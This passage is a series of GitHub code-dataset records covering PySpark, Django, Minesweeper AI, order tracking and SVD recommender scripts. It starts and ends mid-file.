SparkSession, HiveContext\nfrom utils.spark_utils import insertHive\nfrom pyspark.accumulators import Accumulator\n\ndef print_tuple(x):\n tuple_list = []\n for item in x[1]:\n tuple_list.append(item)\n print((x[0], tuple_list))\n\ndef print_rdd(x):\n print(x)\n\ndef requirement1():\n sparkSession = (SparkSession\n .builder\n .appName('example-pyspark-read-and-write-from-hive')\n .config(\"hive.metastore.uris\", \"thrift://localhost:9083\", conf=SparkConf())\n .enableHiveSupport()\n .getOrCreate()\n )\n user_action_rdd = sparkSession.sql(\"select * from user_visit_action_table\").rdd\n\n session_to_action_rdd = user_action_rdd.map(lambda x: (x.session_id, x))\n session_to_action_group = session_to_action_rdd.groupByKey()\n\n session_to_action_group.foreach(print_tuple)\n\n sparkSession.stop()\n\n# requirement1()\n# a = 1 + 3 if 1 < 2 \\\n# and 2 < 3 else 2\n#\n# print(a)\ndef time_earlier(time1, time2):\n # time1 = '2021-01-27 4:34:30'\n # time2 = '2021-01-27 4:35:06'\n\n time1 = get_time_tuple(time1)\n time2 = get_time_tuple(time2)\n\n time1 = datetime.datetime(int(time1[0]), int(time1[1]), int(time1[2]), int(time1[3]), int(time1[4]), int(time1[5]))\n time2 = datetime.datetime(int(time2[0]), int(time2[1]), int(time2[2]), int(time2[3]), int(time2[4]), int(time2[5]))\n\n return time1 < time2\n\ndef get_time_tuple(time):\n time_date = time.split(' ')[0].split('-')\n time_hour_to_second = time.split(' ')[1].split(':')\n\n return (time_date[0], time_date[1], time_date[2], time_hour_to_second[0], time_hour_to_second[1], time_hour_to_second[2])\n\ndef get_datetime_minus_second(time1, time2):\n d1 = datetime.datetime.strptime(time1, '%Y-%m-%d %H:%M:%S')\n d2 = datetime.datetime.strptime(time2, '%Y-%m-%d %H:%M:%S')\n\n delta = d2 - d1\n return delta.seconds\n\nsparkSession = (SparkSession\n .builder\n .appName('example-pyspark-read-and-write-from-hive')\n .config(\"hive.metastore.uris\", \"thrift://localhost:9083\", conf=SparkConf())\n .enableHiveSupport()\n .getOrCreate()\n )\ndf1 = sparkSession.createDataFrame(data=[(1,2),(3,4)],schema=['a','b'])\ndf2 = sparkSession.createDataFrame(data=[(1,2),(5,6)],schema=['a','b'])\ndf3 = df1.intersect(df2)\ndf3.show()\n# requirement1()\n# print(get_datetime_minus_second('2021-01-27 4:34:30','2021-01-27 4:35:06'))\n# print(1 >= 1)\n# res = [i * 300 for i in range(20)]\n# print(res)\n# a = {'one' : 1, 'two' : 2}\n# b = {'one' : 1, 'two' : 2}\n# print(a ==b)\n#\n# def a():\n# def b():\n# print(c)\n# c = 5\n# b()\n# a()\n# requirement1()\n# a = [1,2,3]\n#\n# b = (4,5,6)\n# c = dict(zip(b,a))\n# print(c)\n# s = \"1234\"\n# print(s[0:-3])\n\n","repo_name":"gef0604/E-commerce-Django-PySpark","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41254913706","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\n# A function to plot running speed during gray periods\ndef plot_running_speed_gray_periods(expt_group, session_name, gray_period=5 * 60):\n \"\"\"Plot running speed during gray periods.\n\n Parameters\n ----------\n expt_group : ExperimentGroup\n ExperimentGroup object.\n ession_name : str\n Name of the session, as in the Experiment Object\n gray_period : int, optional\n Length of gray period in seconds, by default 5 * 60\n\n Returns\n -------\n matplotlib.figure.Figure\n Figure object.\n \"\"\"\n # Plot running speed during gray periods\n oeids = expt_group.expt_table.query(\n 'session_name==@session_name').index.values\n # Use 1st expt for the session (running is session-specific, same across experiments)\n exp = expt_group.experiments[oeids[0]]\n\n timepoints = exp.running_speed.timestamps.values\n speed = exp.running_speed.speed.values\n pregray_inds = np.where(timepoints < gray_period)[0]\n\n stim_df = exp.stimulus_presentations\n last_stim_end_time = stim_df.stop_time.values[-1]\n post_gray_end_time = last_stim_end_time + gray_period\n # get timepoints after last stimulus presentation and before gray period ends\n postgray_inds = np.where((timepoints > last_stim_end_time) & (\n timepoints < post_gray_end_time))[0]\n fig, ax = plt.subplots(figsize=(10, 4))\n ax.plot(timepoints[pregray_inds] - timepoints[pregray_inds[0]],\n speed[pregray_inds], label='pre-task gray')\n ax.plot(timepoints[postgray_inds] - timepoints[postgray_inds[0]],\n speed[postgray_inds], label='post-task gray')\n ax.set_xlabel('time (s)')\n ax.set_ylabel('speed (cm/s)')\n ax.set_title(f'{session_name}\\nrunning speed during gray periods')\n ax.legend()\n return fig\n","repo_name":"AllenInstitute/brain_observatory_analysis","sub_path":"brain_observatory_analysis/behavior/plot_running.py","file_name":"plot_running.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"24025420578","text":"str = input()\nres = []\nif str.isupper() or (str[0].islower() and str[1:].isupper()):\n for i in str:\n if i.isupper(): res.append(i.lower())\n else: res.append(i.upper())\n print(\"\".join(res))\nelif len(str) == 1:\n print(str.upper())\nelse: \n print(str)","repo_name":"ManishAradwad/Competitive-Programming","sub_path":"Codeforces/CapsLock(131A).py","file_name":"CapsLock(131A).py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27158356151","text":"from nnoir.functions import *\nfrom .utils import *\n\n\nclass OpAdd(Op):\n\n def __init__(self, node, *args):\n super(OpAdd, self).__init__(node, *args)\n\n def to_function(self, env, constants):\n [a, b] = self.node.input\n\n def constant_add(v, w):\n internal_node = gen_unregisterd_node_name(env)\n register_node(env, internal_node, env[w])\n return [\n Constant([], [internal_node], value=constants[w]),\n Add([v, internal_node], list(self.node.output))\n ]\n\n if a in constants and b not in constants:\n return constant_add(b, a)\n elif a not in constants and b in constants:\n return constant_add(a, b)\n elif a not in constants and b not in constants:\n return [Add(list(self.node.input), list(self.node.output))]\n else:\n raise UnsupportedONNXOperation(self.node, 'bug! (unreachable here)')\n","repo_name":"lflyme/nnoir","sub_path":"nnoir-onnx/nnoir_onnx/operators/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"1296677237","text":"#!/usr/bin/env python3\n\nimport datetime\nimport lib.donations\nimport sys\nimport yaml\nfrom lib.objects_to_sheet import ObjectsToSheet\nfrom lib.tracking import Tracking\nfrom lib.tracking_output import TrackingOutput\nfrom typing import Any\n\nfrom lib.tracking_uploader import TrackingUploader\n\nCONFIG_FILE = \"config.yml\"\nwith open(CONFIG_FILE, 'r') as config_file_stream:\n config = yaml.safe_load(config_file_stream)\n\n\ndef get_group(header, row) -> Any:\n address = row[header.index(\"Shipping Address\")]\n address = address.upper()\n for group in config['groups'].keys():\n group_conf = config['groups'][group]\n reconcile = bool(group_conf['reconcile']) if 'reconcile' in group_conf else True\n group_keys = config['groups'][group]['keys']\n if isinstance(group_keys, str):\n group_keys = [group_keys]\n for group_key in group_keys:\n if str(group_key).upper() in address:\n return group, reconcile\n print(\"No group from row:\")\n print(row)\n return None, True\n\n\ndef from_amazon_row(header, row) -> Tracking:\n tracking = str(row[header.index('Carrier Tracking #')]).upper()\n orders = {row[header.index('Order ID')].upper()}\n price = float(\n str(row[header.index('Shipment Subtotal')]).replace(',',\n '').replace('$',\n '').replace('N/A', '0.0'))\n to_email = row[header.index(\"Account User Email\")]\n original_ship_date = str(row[header.index(\"Shipment Date\")])\n try:\n ship_date = datetime.datetime.strptime(\n original_ship_date, \"%m/%d/%Y\").strftime(\"%Y-%m-%d\") if original_ship_date != 'N/A' else ''\n except:\n try:\n ship_date = (datetime.date(year=1899, day=29, month=12) +\n datetime.timedelta(days=int(original_ship_date))).strftime('%Y-%m-%d')\n except:\n ship_date = \"n/a\"\n group, reconcile = get_group(header, row)\n if group is None:\n return None\n tracked_cost = 0.0\n items = row[header.index(\"Title\")] + \" Qty:\" + str(row[header.index(\"Item Quantity\")])\n merchant = row[header.index('Merchant')] if 'Merchant' in header else 'Amazon'\n return Tracking(\n tracking,\n group,\n orders,\n price,\n to_email,\n ship_date=ship_date,\n tracked_cost=tracked_cost,\n items=items,\n merchant=merchant,\n reconcile=reconcile)\n\n\ndef find_candidate(tracking, candidates) -> Any:\n for candidate in candidates:\n if tracking.tracking_number == candidate.tracking_number:\n return candidate\n return None\n\n\ndef dedupe_trackings(trackings) -> list:\n result = []\n for tracking in trackings:\n candidate = find_candidate(tracking, result)\n if candidate:\n candidate.order_ids = set(candidate.order_ids)\n candidate.order_ids.update(tracking.order_ids)\n if candidate.price:\n candidate.price = float(candidate.price) + tracking.price\n candidate.items += \",\" + tracking.items\n else:\n result.append(tracking)\n return result\n\n\ndef get_required(prompt):\n result = \"\"\n while not result:\n result = str(input(prompt)).strip()\n return result\n\n\ndef main():\n sheet_id = get_required(\"Enter Google Sheet ID: \")\n tab_name = get_required(\"Enter the name of the tab within the sheet: \")\n objects_to_sheet = ObjectsToSheet()\n all_trackings = objects_to_sheet.download_from_sheet(from_amazon_row, sheet_id, tab_name)\n\n num_n_a_trackings = len(\n [ignored for ignored in all_trackings if ignored and ignored.tracking_number == 'N/A'])\n num_empty_trackings = len(\n [ignored for ignored in all_trackings if ignored and ignored.tracking_number == ''])\n print(\n f'Skipping {num_n_a_trackings} for n/a tracking column and {num_empty_trackings} for empty tracking column'\n )\n all_trackings = [\n tracking for tracking in all_trackings\n if tracking and tracking.tracking_number != 'N/A' and tracking.tracking_number != ''\n ]\n len_non_reconcilable_trackings = len([t for t in all_trackings if not t.reconcile])\n print(f'Skipping {len_non_reconcilable_trackings} non-reconcilable trackings')\n all_trackings = [t for t in all_trackings if t.reconcile]\n base_len_trackings = len(all_trackings)\n all_trackings = dedupe_trackings(all_trackings)\n print(f'Filtered {base_len_trackings - len(all_trackings)} duplicate trackings from the sheet')\n\n print('Uploading trackings...')\n tracking_uploader = TrackingUploader(config)\n tracking_uploader.upload_trackings(all_trackings)\n\n tracking_output = TrackingOutput(config)\n print(\"Number of trackings beforehand: %d\" % len(tracking_output.get_existing_trackings()))\n print(\"Number from sheet: %d\" % len(all_trackings))\n tracking_output.save_trackings(all_trackings)\n print(\"Number of trackings after: %d\" % len(tracking_output.get_existing_trackings()))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gomberg5264/order-tracking","sub_path":"import_report.py","file_name":"import_report.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5299348733","text":"from django.core.management.base import BaseCommand, CommandError\r\nfrom old.models import ShopCategory\r\nfrom shop.models import Category\r\n\r\n\r\n\r\nclass Command(BaseCommand):\r\n\r\n def handle(self, *args, **options):\r\n for c in ShopCategory.objects.using('old').all().order_by('-parent_id'):\r\n category = Category.objects.filter(slug=c.slug).first()\r\n if not category:\r\n category = Category(pk=c.pk)\r\n\r\n category.name = c.name\r\n category.slug = c.slug\r\n category.title = c.title\r\n category.description = c.metadesc\r\n category.keywords = c.metakey\r\n if c.parent_id:\r\n parent = Category.objects.filter(pk=c.parent_id).first()\r\n if parent:\r\n category.parent = parent\r\n category.image = c.image\r\n category.save()\r\n print(category.id)\r\n ","repo_name":"webmagicc/simple-django-shop","sub_path":"old/management/commands/import_categories.py","file_name":"import_categories.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"42390793023","text":"#!/usr/local/bin/python3\n\ndef main():\n arr = []\n with open('input.txt', 'r') as f:\n for line in f:\n arr.append(int(line.rstrip()))\n\n tot = 0\n prev_window = 1000000000\n\n for n in range(len(arr)-2):\n window = sum(arr[n:n+3])\n# print(window, prev_window)\n if window > prev_window:\n tot += 1\n prev_window = window\n print(tot)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"nico-castro/advent-of-code","sub_path":"2021/1/q2_answer.py","file_name":"q2_answer.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36406422733","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom decimal import Decimal\nfrom django import forms\n\n\nclass ExtFileField(forms.FileField):\n \"\"\"\n * max_upload_size - a number indicating the maximum file size allowed for upload.\n 500Kb - 524288\n 1MB - 1048576\n 2.5MB - 2621440\n 5MB - 5242880\n 10MB - 10485760\n 20MB - 20971520\n 50MB - 5242880\n 100MB 104857600\n 250MB - 214958080\n 500MB - 429916160\n t = ExtFileField(ext_whitelist=(\".pdf\", \".txt\"), max_upload_size=)\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n ext_whitelist = kwargs.pop(\"ext_whitelist\")\n self.ext_whitelist = [i.lower() for i in ext_whitelist]\n self.max_upload_size = kwargs.pop(\"max_upload_size\")\n super(ExtFileField, self).__init__(*args, **kwargs)\n\n def clean(self, *args, **kwargs):\n upload = super(ExtFileField, self).clean(*args, **kwargs)\n if upload:\n size = upload.size\n filename = upload.name\n ext = os.path.splitext(filename)[1]\n ext = ext.lower()\n\n if size == 0 or ext not in self.ext_whitelist or size > self.max_upload_size:\n raise forms.ValidationError(\"Tipo de fichero o tamanno no permitido!\")\n\n\nclass NeuralCSVForm(forms.Form):\n csv = ExtFileField(label=u'CSV File', ext_whitelist=\".csv\", max_upload_size=2621440)\n","repo_name":"georgenavarro1802/neural3","sub_path":"nn/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29375776782","text":"import itertools\nimport random\n\n\nclass Minesweeper():\n \"\"\"\n Minesweeper game representation\n \"\"\"\n\n def __init__(self, height=8, width=8, mines=8):\n\n # Set initial width, height, and number of mines\n self.height = height\n self.width = width\n self.mines = set()\n\n # Initialize an empty field with no mines\n self.board = []\n for i in range(self.height):\n row = []\n for j in range(self.width):\n row.append(False)\n self.board.append(row)\n\n # Add mines randomly\n while len(self.mines) != mines:\n i = random.randrange(height)\n j = random.randrange(width)\n if not self.board[i][j]:\n self.mines.add((i, j))\n self.board[i][j] = True\n\n # At first, player has found no mines\n self.mines_found = set()\n\n def print(self):\n \"\"\"\n Prints a text-based representation\n of where mines are located.\n \"\"\"\n for i in range(self.height):\n print(\"--\" * self.width + \"-\")\n for j in range(self.width):\n if self.board[i][j]:\n print(\"|X\", end=\"\")\n else:\n print(\"| \", end=\"\")\n print(\"|\")\n print(\"--\" * self.width + \"-\")\n\n def is_mine(self, cell):\n try:\n i, j = cell\n except Exception as ex:\n print(cell)\n raise ex\n return self.board[i][j]\n\n def nearby_mines(self, cell):\n \"\"\"\n Returns the number of mines that are\n within one row and column of a given cell,\n not including the cell itself.\n \"\"\"\n\n # Keep count of nearby mines\n count = 0\n\n # Loop over all cells within one row and column\n for i in range(cell[0] - 1, cell[0] + 2):\n for j in range(cell[1] - 1, cell[1] + 2):\n\n # Ignore the cell itself\n if (i, j) == cell:\n continue\n\n # Update count if cell in bounds and is mine\n if 0 <= i < self.height and 0 <= j < self.width:\n if self.board[i][j]:\n count += 1\n\n return count\n\n def won(self):\n \"\"\"\n Checks if all mines have been flagged.\n \"\"\"\n return self.mines_found == self.mines\n\n\nclass Sentence():\n \"\"\"\n Logical statement about a Minesweeper game\n A sentence consists of a set of board cells,\n and a count of the number of those cells which are mines.\n \"\"\"\n\n def __init__(self, cells, count):\n self.cells = set(cells)\n self.count = count\n\n def __eq__(self, other):\n return self.cells == other.cells and self.count == other.count\n\n def __str__(self):\n return f\"{self.cells} = {self.count}\"\n\n def known_mines(self):\n \"\"\"\n Returns the set of all cells in self.cells known to be mines.\n \"\"\"\n return self.cells if self.count == len(self.cells) else set()\n\n def known_safes(self):\n \"\"\"\n Returns the set of all cells in self.cells known to be safe.\n \"\"\"\n return self.cells if self.count == 0 else set()\n\n def mark_mine(self, cell):\n \"\"\"\n Updates internal knowledge representation given the fact that\n a cell is known to be a mine.\n \"\"\"\n if cell in self.cells:\n self.cells.remove(cell)\n self.count -= 1\n\n def mark_safe(self, cell):\n \"\"\"\n Updates internal knowledge representation given the fact that\n a cell is known to be safe.\n \"\"\"\n if cell in self.cells:\n self.cells.remove(cell)\n\n\nclass MinesweeperAI():\n \"\"\"\n Minesweeper game player\n \"\"\"\n\n def __init__(self, height=8, width=8):\n\n # Set initial height and width\n self.height = height\n self.width = width\n\n # Keep track of which cells have been clicked on\n self.moves_made = set()\n\n # Keep track of cells known to be safe or mines\n self.mines = set()\n self.safes = set()\n\n # List of sentences about the game known to be true\n self.knowledge = []\n\n def mark_mine(self, cell):\n \"\"\"\n Marks a cell as a mine, and updates all knowledge\n to mark that cell as a mine as well.\n \"\"\"\n self.mines.add(cell)\n print(\"*** *** mark mine:\", cell)\n for sentence in self.knowledge:\n sentence.mark_mine(cell)\n\n def mark_safe(self, cell):\n \"\"\"\n Marks a cell as safe, and updates all knowledge\n to mark that cell as safe as well.\n \"\"\"\n self.safes.add(cell)\n for sentence in self.knowledge:\n sentence.mark_safe(cell)\n\n def compute_knowledge_coords(self):\n return set(itertools.chain.from_iterable(sentence.cells for sentence in self.knowledge))\n\n def add_knowledge(self, cell, count):\n \"\"\"\n Called when the Minesweeper board tells us, for a given\n safe cell, how many neighboring cells have mines in them.\n\n This function should:\n 1) mark the cell as a move that has been made\n 2) mark the cell as safe\n 3) add a new sentence to the AI's knowledge base\n based on the value of `cell` and `count`\n 4) mark any additional cells as safe or as mines\n if it can be concluded based on the AI's knowledge base\n 5) add any new sentences to the AI's knowledge base\n if they can be inferred from existing knowledge\n \"\"\"\n\n # 1 • The function should mark the cell as one of the moves made in the game.\n self.moves_made.add(cell)\n\n # 2 • The function should mark the cell as a safe cell, updating any sentences that contain the cell as well.\n self.mark_safe(cell)\n\n # 3 • The function should add a new sentence to the AI’s knowledge base, based on the value of cell and count, to indicate that count of the cell’s neighbors are mines. Be sure to only include cells whose state is still undetermined in the sentence.\n x, y = cell\n adjacent_cells = {\n (i, j)\n for i in range(x-1, x+1+1)\n for j in range(y-1, y+1+1)\n if 0 <= i and i < self.height\n and 0 <= j and j < self.width\n }\n adjacent_cells -= {cell}\n\n # exclude known mines\n valid_adjacent_cells = adjacent_cells - self.mines\n # deduct (number of known mines excluded) from count!\n new_count = count - (len(adjacent_cells) - len(valid_adjacent_cells))\n\n # exclude known safes\n valid_adjacent_cells -= self.safes\n\n if len(valid_adjacent_cells) > 0:\n self.knowledge.append(\n Sentence(valid_adjacent_cells, new_count)) # use new_count!\n\n # \"Updating\" involves checking each sentence for known mines / safes, and marking them on all sentences.\n def update_knowledge(sentence_list):\n unmarked_safes = set()\n unmarked_mines = set()\n\n # accumulate unmarked mines and safes\n for sentence in sentence_list:\n sentence_size = len(sentence.cells)\n if sentence_size == 0:\n self.knowledge.remove(sentence)\n continue\n known_safes = sentence.known_safes()\n if len(known_safes) > 0:\n unmarked_safes |= known_safes\n self.knowledge.remove(sentence)\n continue\n known_mines = sentence.known_mines()\n if len(known_mines) > 0:\n unmarked_mines |= known_mines\n self.knowledge.remove(sentence)\n\n # return the fact that no changes are needed\n if len(unmarked_mines) == 0 and len(unmarked_safes) == 0:\n return False\n\n # update knowledge\n self.mines |= unmarked_mines\n self.safes |= unmarked_safes\n for mine in unmarked_mines:\n self.mark_mine(mine)\n for safe in unmarked_safes:\n self.mark_safe(safe)\n\n # return the fact that changes have been made\n return True\n\n # Keep looping until knowledge is updated completely.\n count = 0\n max = 99\n print()\n while True:\n print(\"loop count:\", count)\n if count >= max:\n print(f\"looped to maximum of {max} times\")\n break\n count += 1\n # 4 • If, based on any of the sentences in self.knowledge, new cells can be marked as safe or as mines, then the function should do so.\n\n is_changes_made1 = update_knowledge(self.knowledge)\n\n # 5 • If, based on any of the sentences in self.knowledge, new sentences can be inferred (using the subset method described in the Background), then those sentences should be added to the knowledge base as well.\n\n # detect overlapping sentences, for each relevant coordinate\n overlaps_per_coord = dict()\n for coord in self.compute_knowledge_coords():\n # print(coord)\n overlaps = []\n uniques = set()\n for sentence in self.knowledge:\n cells = frozenset(sentence.cells)\n count = sentence.count\n if coord in cells:\n if (cells, count) not in uniques:\n overlaps.append(sentence)\n uniques.add((cells, count))\n else:\n # remove duplicate sentence\n self.knowledge.remove(sentence)\n if len(overlaps) >= 2:\n overlaps_per_coord[coord] = overlaps\n # # debug print\n # for k,v in overlaps_per_coord.items():\n # print(k,v)\n\n # employing subset method with each sentence pair permutation\n permutations_per_coord = dict()\n for coord, overlaps in overlaps_per_coord.items():\n permutations_per_coord[coord] = itertools.permutations(\n overlaps, 2)\n # # debug print\n # for k,v in permutations_per_coord.items():\n # print(k,v)\n\n # stored as hashable tuples instead of Sentence(), to eliminate duplicates\n new_sentences = set()\n\n for coord, permutations in permutations_per_coord.items():\n print(\"subset technique for:\", coord, end=\" \")\n for j, (left, right) in enumerate(permutations):\n if left.cells < right.cells:\n print(f\"\\n{j}\", end=\" \")\n new_sentence_tuple = ( # needs to be hashable\n frozenset(right.cells - left.cells),\n right.count - left.count\n )\n print(new_sentence_tuple, end=\" \")\n new_sentences.add(new_sentence_tuple)\n else:\n print(j, end=\" \")\n print(\"\\n\")\n # left.cells == right.cells can be ignored because the result will be empty set with 0 count\n\n new_sentences = list(map(\n lambda tuple: Sentence(tuple[0], tuple[1]),\n new_sentences\n ))\n\n if len(new_sentences) > 0:\n print(\"__add subset technique new sentences__\")\n for ns in new_sentences:\n print(ns)\n\n self.knowledge += new_sentences\n # only new sentences need to be updated here\n if len(new_sentences) > 0:\n print(\"update knowledge (new sentences)\")\n is_changes_made_2 = update_knowledge(new_sentences)\n else:\n is_changes_made_2 = False\n\n is_changes_made = is_changes_made1 or is_changes_made_2\n\n # no changes made means loop can stop\n if is_changes_made is False:\n break\n print(\"___knowledge___\")\n for sentence in self.knowledge:\n print(sentence)\n print(\"___mines___\")\n print(self.mines)\n print(\"___safe moves___\")\n print(self.safes - self.moves_made)\n\n def make_safe_move(self):\n \"\"\"\n Returns a safe cell to choose on the Minesweeper board.\n The move must be known to be safe, and not already a move\n that has been made.\n\n This function may use the knowledge in self.mines, self.safes\n and self.moves_made, but should not modify any of those values.\n \"\"\"\n possible_set = (self.safes - self.moves_made)\n move = next(iter(possible_set)) if len(possible_set) > 0 else None\n\n if move is not None:\n print()\n print(\"-->\", move)\n return move\n\n def compute_possible_set(self):\n return (\n set(itertools.product(range(self.height), range(self.width)))\n - self.moves_made\n - self.mines\n )\n\n def make_random_move(self):\n \"\"\"\n Returns a move to make on the Minesweeper board.\n Should choose randomly among cells that:\n 1) have not already been chosen, and\n 2) are not known to be mines\n \"\"\"\n possible_set = self.compute_possible_set()\n\n if len(possible_set) == 0:\n return None\n\n move = random.sample(possible_set, 1)[0]\n\n for _ in range(5):\n print(\"*\")\n print(\"??-->\", move)\n return move\n","repo_name":"2jacobtan/CS50ai","sub_path":"1b minesweeper/minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":13730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15512961394","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy.optimize\n\nfrom evaluators.recommender_evaluator import RecommenderEvaluator\nfrom predictors.svd_predictor import SVDPredictor, prepare_df_svd\nfrom validators.k_fold_validator import KFoldValidator\n\nimport logging\nfrom logger import logger\n\ndef main():\n\n df = prepare_df_svd(\"data/training_set.csv\")\n\n predictor_target = \"weighted_relevance\"\n evaluator_target = \"relevance\"\n row_attribute = \"srch_id\"\n column_attribute = \"prop_id\"\n similarity_attributes = [\"srch_length_of_stay\", \"srch_booking_window\", \"srch_adults_count\", \"srch_children_count\", \"srch_room_count\"]\n\n optimal_weights = optimize_weights_NM(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes)\n # optimal_weights = []\n optimal_n_clusters = optimize_n_clusters(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes, optimal_weights)\n optimal_n_svd_dimensions = optimize_n_svd_dimensions(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes, optimal_weights, optimal_n_clusters)\n\n logger.info(f\"Optimal {optimal_weights}, {optimal_n_clusters}, {optimal_n_svd_dimensions}\")\n\ndef set_df_types(df):\n \n categorical_columns = [\n \"srch_id\",\n \"prop_id\",\n \"click_bool\",\n \"booking_bool\",\n ] \n\n df[categorical_columns] = df[categorical_columns].astype(\"category\")\n\n return df\n\ndef optimize_weights(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes):\n\n def get_initial_weights():\n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute, row_similarity_attributes=similarity_attributes)\n predictor.training_df = df\n return predictor.compute_row_similarity_weights()\n\n def validate_svd_recommender(similarity_weights):\n \n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute,\n row_similarity_attributes=similarity_attributes,\n row_similarity_weights=similarity_weights)\n \n evaluator = RecommenderEvaluator(evaluator_target, predictor, predictor.row_attribute)\n validator = KFoldValidator(df, evaluator, predictor, n_folds=2)\n score, std_error = validator.validate()\n\n logger.setLevel(logging.PROGRESS)\n logger.progress(f\"Score: {score} +- {std_error}. weights: {similarity_weights}\")\n logger.setLevel(logging.INFO)\n\n return -score\n\n initial_weights = get_initial_weights()\n # validate_svd_recommender(initial_weights)\n\n response = scipy.optimize.minimize(validate_svd_recommender, initial_weights)\n\n optimal_weights = response.x\n\n validate_svd_recommender(optimal_weights)\n\n return optimal_weights\n\ndef optimize_weights_NM(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes):\n \n def get_initial_weights():\n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute, row_similarity_attributes=similarity_attributes)\n predictor.training_df = df\n return predictor.compute_row_similarity_weights()\n \n def get_initial_complex(initial_weights):\n \n initial_weights = initial_weights / 2\n N = len(initial_weights)\n\n simplex = np.empty((N + 1, N), dtype=initial_weights.dtype)\n simplex[0] = initial_weights\n for k in range(N):\n y = np.array(initial_weights, copy=True)\n if y[k] != 0:\n y[k] = 4*y[k]\n else:\n y[k] = 0.001\n \n simplex[k + 1] = y\n\n return simplex\n\n def validate_svd_recommender(similarity_weights):\n \n similarity_weights[similarity_weights < 0] = 0\n\n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute,\n row_similarity_attributes=similarity_attributes,\n row_similarity_weights=similarity_weights)\n \n evaluator = RecommenderEvaluator(column_attribute, predictor, row_attribute, evaluator_target)\n validator = KFoldValidator(df, evaluator, predictor, n_folds=2)\n score, std_error = validator.validate()\n\n logger.setLevel(logging.PROGRESS)\n logger.progress(f\"Score: {score} +- {std_error}. weights: {similarity_weights}\")\n logger.setLevel(logging.INFO)\n\n return -score\n\n logger.status(\"Starting optimization procedure\")\n logger.setLevel(logging.INFO)\n\n initial_weights = get_initial_weights()\n\n validate_svd_recommender(initial_weights)\n\n initial_simplex = get_initial_complex(initial_weights)\n\n response = scipy.optimize.fmin(validate_svd_recommender, initial_weights, initial_simplex=initial_simplex, full_output=True, maxfun=50)\n\n initial_score = validate_svd_recommender(initial_weights)\n optimal_weights, minimum = response[0], response[1]\n \n logger.info(f\"Initial score: {-initial_score}. weights: {initial_weights}\")\n logger.info(f\"Optimized score: {-minimum}. weights: {optimal_weights}\")\n\n return optimal_weights\n\n\ndef plot_between(x, y, yerror):\n\n x, y, yerror = np.array(x), np.array(y), np.array(yerror)\n\n plt.plot(x, y)\n plt.fill_between(x, y - yerror, y + yerror, alpha=0.2)\n\n \ndef optimize_n_clusters(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes, similarity_weights, show=False):\n\n cluster_sizes = range(2, 20)\n\n scores, errors = [], []\n for n_clusters in cluster_sizes:\n logger.setLevel(logging.PROGRESS)\n logger.progress(f\"Current cluster size {n_clusters}\")\n logger.setLevel(logging.INFO)\n\n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute, row_similarity_attributes=similarity_attributes, row_similarity_weights=similarity_weights,\n n_clusters=n_clusters)\n\n evaluator = RecommenderEvaluator(column_attribute, predictor, row_attribute, evaluator_target)\n validator = KFoldValidator(df, evaluator, predictor, n_folds=2)\n score, std_error = validator.validate()\n\n scores.append(score)\n errors.append(std_error)\n\n plot_between(cluster_sizes, scores, errors)\n \n plt.xlabel(\"N clusters\")\n plt.ylabel(\"Score\")\n plt.title(\"N cluster research\")\n\n plt.savefig(\"figures/hyper/n_clusters.png\")\n\n if show:\n plt.show()\n else:\n plt.close()\n\n best_score_index = scores.index(max(scores))\n best_n_clusters = cluster_sizes[best_score_index]\n best_score = scores[best_score_index]\n best_error = errors[best_score_index]\n\n logger.info(f\"Best N clusters: {best_n_clusters}. Score {best_score} +- {best_error}\")\n return best_n_clusters\n\n \ndef optimize_n_svd_dimensions(df, predictor_target, evaluator_target, row_attribute, column_attribute, similarity_attributes, similarity_weights, n_clusters, show=False):\n\n svd_dimension_values = range(1, n_clusters)\n scores, errors = [], []\n for n_svd_dimensions in svd_dimension_values:\n logger.setLevel(logging.PROGRESS)\n logger.progress(f\"Current SVD dimensions {n_svd_dimensions}\")\n logger.setLevel(logging.INFO)\n\n predictor = SVDPredictor(predictor_target, row_attribute, column_attribute, \n row_similarity_attributes=similarity_attributes,\n row_similarity_weights=similarity_weights,\n n_clusters=n_clusters,\n n_svd_dimensions=n_svd_dimensions)\n\n evaluator = RecommenderEvaluator(column_attribute, predictor, row_attribute, evaluator_target)\n validator = KFoldValidator(df, evaluator, predictor, n_folds=2)\n score, std_error = 